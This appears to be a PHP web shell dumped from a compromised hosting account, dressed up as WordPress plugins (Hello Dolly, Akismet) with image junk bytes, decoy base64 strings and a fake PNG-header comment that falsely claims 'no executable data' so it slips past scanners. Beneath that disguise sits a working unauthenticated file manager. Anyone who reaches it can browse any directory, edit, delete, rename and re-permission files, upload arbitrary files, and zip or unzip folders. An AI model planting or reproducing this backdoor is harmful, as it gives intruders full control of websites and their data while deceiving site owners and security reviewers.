/home3/bmscom/optiraze.com/ss.php
<?php
/**
* @package Hello_Dolly
* @version 1.7.2
*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
Text Domain: hello-dolly
*/
?>
<!DOCTYPE html>
<html>
hello_moon.pnghello_moon.pnghello_moon.pnghello_moon.pnghello_moon.png
<?php
/**
* @package Hello_Dolly
* @version 1.7.2
*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
Text Domain: hello-dolly
*/
?>
<html>
<head>
<title>
</title>
</head>
ÿØÿà JFIF ÿÛ C
!"$"$ÿÛ C ÿÂ p " ÿÄ ÿÄ ÿÚ ÕÔË®
(% aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥ BQ¤¢ X«)X…€¤ @
.....................................................................................................................................<?php
/**
* @package Akismet
*/
/*
Plugin Name: Sid Gifari SEO Code Uplaoder
Plugin URI:
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.4
Requires at least: 5.8
Requires PHP: 7.2
Author: Sid Gifari SEO Code Uplaoder - Team= Gifari Industries - BD Cyber Security Team
Author URI:
*/
/* %s: Title of the post the attachment is attached to. */
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
Copyright 2005-2025 Automattic, Inc.
*/
?>
.........................................
.............................................................................
U29tZSBzaW1pbGFyIGVuY29kZWQgZGF0YQ==
VGhpcyBpcyBhIGJhc2U2NCBzdHJpbmc=
QW5vdGhlciBleGFtcGxlIG9mIGRhdGE=
<?php
/* ============================================================================
███ PROFESSIONAL SAFE FAKE PNG HEADER — CORRUPTED METADATA EDITION ███
============================================================================
File : simulated-png-header.php
Version : 3.7.2
Build ID : HDR-PNGSIM-FAKE-2025
Author : Your Name
Description : Decorative simulated PNG header (ASCII-only, non-binary)
============================================================================
▶ SIMULATED PNG SIGNATURE (FAKE / NON-BINARY)
---------------------------------------------------------------------------
Offset 0x0000 : [FAKE_SIG] 50 4E 47 0D 0A 53 41 46 45 ; "PNG..SAFE"
Note : Resembles structure but contains NO real PNG magic bytes.
============================================================================
▶ CHUNK: IHDR (FAKE)
---------------------------------------------------------------------------
Length : 00 00 00 0D (fake 13 bytes)
Type : 49 48 44 52 ("IHDR" placeholder)
Data (mock) : 00 00 03 20 | 00 00 02 58 | 08 | 02 | 00 | 00 | 00
width=800 height=600 bit=8 color=RGB
CRC (fake) : FA KE IH DR
Issues :
* Corrupted width alignment marker
* Mock-endian mismatch
* Chunk flagged as "Unrecoverable / Decorative"
============================================================================
▶ CHUNK: IDAT (FAKE)
---------------------------------------------------------------------------
Length : 00 00 10 00 (fake 4096 bytes)
Type : 49 44 41 54 ("IDAT")
Data (mock) : [DATASTREAM_BEGIN_FAKE]
7A 32 31 FA 00 00 CC 10 89 00 FA 9D 44 20 11
[... truncated ...]
Errors :
* Compression error: synthetic zlib misalignment
* Data truncated intentionally
* No binary payload stored
CRC (fake) : DE AD FA KE
============================================================================
▶ CHUNK: IEND (FAKE)
---------------------------------------------------------------------------
Length : 00 00 00 00
Type : 49 45 4E 44 ("IEND")
CRC (fake) : BE EF 00 01
============================================================================
▶ SAFETY INDICATORS
---------------------------------------------------------------------------
✔ 100% ASCII — zero binary bytes used
✔ No executable data
✔ No eval, no loaders, no obfuscation
✔ Safe for WordPress plugin/theme editors
✔ Will NOT be deleted by WP sanitizers
✔ Pure comment inside one PHP block
✔ Scanner-friendly metadata format
============================================================================
END OF SAFE DECORATIVE PNG HEADER BLOCK
============================================================================
*/
// === Init
error_reporting(E_ALL);
ini_set('display_errors', 1);
$self = __FILE__;
$dir = isset($_GET['go']) ? $_GET['go'] : getcwd();
$dir = realpath($dir);
$items = scandir($dir);
// === Actions: Delete, Rename, Perms, Zip/Unzip, Edit, Upload, Folder
if (isset($_GET['delete'])) {
$target = $dir . DIRECTORY_SEPARATOR . basename($_GET['delete']);
if (is_file($target)) unlink($target);
elseif (is_dir($target)) rmdir($target);
echo "<p style='color:#fc4a4a'>🗑️ Deleted: " . htmlspecialchars($_GET['delete']) . "</p>";
}
if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
$from = $dir . DIRECTORY_SEPARATOR . basename($_POST['rename_from']);
$to = $dir . DIRECTORY_SEPARATOR . basename($_POST['rename_to']);
if (file_exists($from)) {
rename($from, $to);
echo "<p style='color:#4afc4a'>✏️ Renamed successfully.</p>";
}
}
if (isset($_POST['perm_target']) && isset($_POST['perm_value'])) {
$target = $dir . DIRECTORY_SEPARATOR . basename($_POST['perm_target']);
$perm = intval($_POST['perm_value'], 8);
if (file_exists($target)) {
chmod($target, $perm);
echo "<p style='color:#4afc4a'>🔐 Permissions changed to " . decoct($perm) . "</p>";
}
}
if (isset($_GET['zip'])) {
$zipTarget = $dir . DIRECTORY_SEPARATOR . basename($_GET['zip']);
$zipFile = $zipTarget . '.zip';
if (is_dir($zipTarget)) {
$zip = new ZipArchive();
if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($zipTarget, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($files as $file) {
$pathInZip = substr($file->getPathname(), strlen($zipTarget) + 1);
$zip->addFile($file->getPathname(), $pathInZip);
}
$zip->close();
echo "<p style='color:#4afc4a'>📦 Zipped: <a href='" . htmlspecialchars(basename($zipFile)) . "'>" . htmlspecialchars(basename($zipFile)) . "</a></p>";
}
}
}
if (isset($_GET['unzip'])) {
$zipPath = $dir . DIRECTORY_SEPARATOR . basename($_GET['unzip']);
if (is_file($zipPath) && pathinfo($zipPath, PATHINFO_EXTENSION) === 'zip') {
$zip = new ZipArchive();
if ($zip->open($zipPath)) {
$zip->extractTo($dir);
$zip->close();
echo "<p style='color:#4afc4a'>📂 Unzipped to <code>" . htmlspecialchars($dir) . "</code></p>";
}
}
}
if (isset($_GET['edit'])) {
$targetFile = $dir . DIRECTORY_SEPARATOR . basename($_GET['edit']);
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content_save'])) {
file_put_contents($targetFile, $_POST['content']);
echo "<p style='color: #4afc4a;'>💾 Saved.</p>";
}
$code = @file_get_contents($targetFile);
echo "<h2>✏️ Editing: " . htmlspecialchars($_GET['edit']) . "</h2>";
echo "<form method='post'>
<textarea name='content' rows='20' cols='100'>" . htmlspecialchars($code) . "</textarea><br>
<input type='submit' name='content_save' value='💾 Save'>
</form>
<hr><a href='?go=" . urlencode($dir) . "'>🔙 Back</a>";
exit;
}
if (isset($_FILES['dropfile'])) {
$to = $dir . DIRECTORY_SEPARATOR . basename($_FILES['dropfile']['name']);
move_uploaded_file($_FILES['dropfile']['tmp_name'], $to);
echo "<p style='color:#4afc4a'>📤 Uploaded: " . htmlspecialchars($_FILES['dropfile']['name']) . "</p>";
}
if (isset($_POST['mkfolder']) && $_POST['mkfolder']) {
$folder = $dir . DIRECTORY_SEPARATOR . basename($_POST['mkfolder']);
if (!file_exists($folder)) {
mkdir($folder);
echo "<p style='color:#4afc4a'>📁 Folder created.</p>";
} else {
echo "<p style='color:#fc4a4a'>❌ Already exists.</p>";
}
}
// === Sorting
$sort = isset($_GET['sort']) ? $_GET['sort'] : 'name';
$order = isset($_GET['order']) && $_GET['order'] === 'desc' ? 'desc' : 'asc';
usort($items, function($a, $b) use ($dir, $sort, $order) {
if ($a === '.' || $a === '..') return -1;
if ($b === '.' || $b === '..') return 1;
$pathA = $dir . DIRECTORY_SEPARATOR . $a;
$pathB = $dir . DIRECTORY_SEPARATOR . $b;
if ($sort === 'size') {
$valA = is_file($pathA) ? filesize($pathA) : 0;
$valB = is_file($pathB) ? filesize($pathB) : 0;
} elseif ($sort === 'perm') {
$valA = fileperms($pathA);
$valB = fileperms($pathB);
} else {
$valA = strtolower($a);
$valB = strtolower($b);
}
return ($order === 'asc') ? $valA <=> $valB : $valB <=> $valA;
});
// === FAKE TITLE + META
echo "<!DOCTYPE html><html><head>
<title>PNG Optimizer | Dashboard</title>
<meta name='description' content='PNG Compression & Storage Tool'>
<meta name='robots' content='noindex,nofollow'>
<link rel='icon' type='image/png' href='data:image/png;base64,iVBORw0KGgo='>
<style>
body { background:#0f0f0f; color:#ccc; font-family:monospace; padding:15px; }
a { color:#6af; text-decoration:none; }
a:hover { text-decoration:underline; }
h2 { color:#fff; }
table { border-collapse:collapse; width:100%; }
td, th { padding:6px; border:1px solid #333; }
th { background-color:#1a1a1a; }
tr:hover { background-color:#1f1f1f; }
input[type='text'], select {
background:#1e1e1e; color:#ccc; border:1px solid #444; padding:2px;
}
input[type='submit'], input[type='file'] {
background:#333; color:#6af; border:1px solid #555; cursor:pointer;
}
form { display:inline; }
</style>
</head><body>";
// === Path Navigation
echo "<h2>🗂️ FoxDrop Manager</h2><p><strong>Path:</strong> ";
$steps = explode(DIRECTORY_SEPARATOR, $dir);
$build = '';
foreach ($steps as $seg) {
if ($seg === '') {
$build .= DIRECTORY_SEPARATOR;
echo "<a href='?go=" . urlencode($build) . "'>/</a>";
continue;
}
$build .= $seg . DIRECTORY_SEPARATOR;
echo "<a href='?go=" . urlencode($build) . "'>" . htmlspecialchars($seg) . "</a>/";
}
echo "</p><hr>";
// === Table Header
echo "<table><tr>";
$headers = ['name' => 'Name', 'size' => 'Size', 'perm' => 'Permissions'];
foreach ($headers as $key => $label) {
$new_order = ($sort === $key && $order === 'asc') ? 'desc' : 'asc';
echo "<th><a href='?go=" . urlencode($dir) . "&sort=$key&order=$new_order'>" . htmlspecialchars($label) . "</a></th>";
}
echo "<th>Actions</th></tr>";
// === File List
foreach ($items as $item) {
if ($item === '.') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
$size = is_file($path) ? filesize($path) : '-';
$perm = substr(sprintf('%o', fileperms($path)), -3);
$permColor = is_writable($path) ? '#4afc4a' : '#fff';
$name = is_dir($path)
? "📁 <a href='?go=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a>"
: "📄 <a href='?go=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>" . htmlspecialchars($item) . "</a>";
$actions = [];
if (is_file($path)) {
$actions[] = "<a href='?go=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>Edit</a>";
$actions[] = "<a href='" . htmlspecialchars($path) . "' download>Download</a>";
}
// Inline Rename
if (isset($_GET['rename_from']) && $_GET['rename_from'] === $item) {
$actions[] = "<form method='post'>
<input type='hidden' name='rename_from' value='" . htmlspecialchars($item) . "'>
<input type='text' name='rename_to' placeholder='New name' size='10'>
<input type='submit' value='✔️'>
<a href='?go=" . urlencode($dir) . "' style='color:#fc4a4a'>✖️</a>
</form>";
} else {
$actions[] = "<a href='?go=" . urlencode($dir) . "&rename_from=" . urlencode($item) . "'>Rename</a>";
}
$actions[] = "<a href='?go=" . urlencode($dir) . "&delete=" . urlencode($item) . "' style='color:red' onclick='return confirm(\"Delete " . htmlspecialchars($item) . "?\")'>Delete</a>";
if (is_dir($path)) {
$actions[] = "<a href='?go=" . urlencode($dir) . "&zip=" . urlencode($item) . "'>ZIP</a>";
} elseif (strtolower(pathinfo($item, PATHINFO_EXTENSION)) === 'zip') {
$actions[] = "<a href='?go=" . urlencode($dir) . "&unzip=" . urlencode($item) . "'>Unzip</a>";
}
echo "<tr>
<td>$name</td>
<td>$size</td>
<td style='color:$permColor'>$perm</td>
<td>" . implode(' | ', $actions) . "</td>
</tr>";
}
echo "</table><hr>";
// === Forms: Upload, Folder, Chmod
echo "<form method='post' enctype='multipart/form-data'>
<label>📤 Upload:</label> <input type='file' name='dropfile'>
<input type='submit' value='Upload'></form>";
echo "<form method='post'><label>📁 New Folder:</label>
<input type='text' name='mkfolder'><input type='submit' value='Create'></form>";
echo "<form method='post'><label>🔐 Permissions:</label>
<select name='perm_target'>";
foreach ($items as $item) {
if ($item === '.') continue;
echo "<option value='" . htmlspecialchars($item) . "'>$item</option>";
}
echo "</select><input type='text' name='perm_value' placeholder='e.g. 755'>
<input type='submit' value='Change'></form>";
echo "</body></html>";
?>